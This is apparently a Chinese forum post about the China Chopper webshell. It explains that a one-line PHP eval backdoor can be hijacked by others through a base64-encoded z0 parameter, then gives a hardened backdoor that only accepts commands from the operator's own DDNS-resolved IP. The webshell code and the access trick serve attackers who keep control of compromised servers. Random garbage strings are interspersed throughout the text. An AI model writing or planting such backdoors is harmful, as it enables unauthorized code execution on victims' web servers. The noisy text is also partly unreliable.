今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞3 `: b! a6 P+ c+ P$ p
0 [( s9 N2 V, R/ h6 W
就算你设置了密码,使用了eval($_REQUEST['moyo']);
% J8 @: B# A$ ~4 o9 |
& G8 P7 e& C& _ l+ V+ g. [但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
: k$ D' l9 V1 B( B
0 H% s, F% K. O, {( K! l因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));& Y- u _1 V, Y. k
# o5 q! F0 l7 d
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了0 W# I. K5 G, b; R- v$ Y
; m5 `, {( y C! d# Y+ S& ]7 ^% ^不知道是设计缺陷还是故意留的后门
% S0 ?: u- x* C
\% R1 C! C" Q# D) ?- n如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
7 w- \7 `' D! G( h
' g$ h& ?- w5 Z: B7 e本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
J# [/ {; N/ P2 j9 K) x/ t+ y1 ^9 T* p" S3 s& P* D8 X0 I5 N* G
然后一句话后门这样写6 s' l! }% y: d& p
5 p7 r. {& X" v
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
( y9 Q( x$ ]2 D. f( z这样就可以让一句话后门只允许自己的电脑连接了
0 R) S' Y# O6 G5 A6 k# N) m7 R3 d: F! t& i! c
|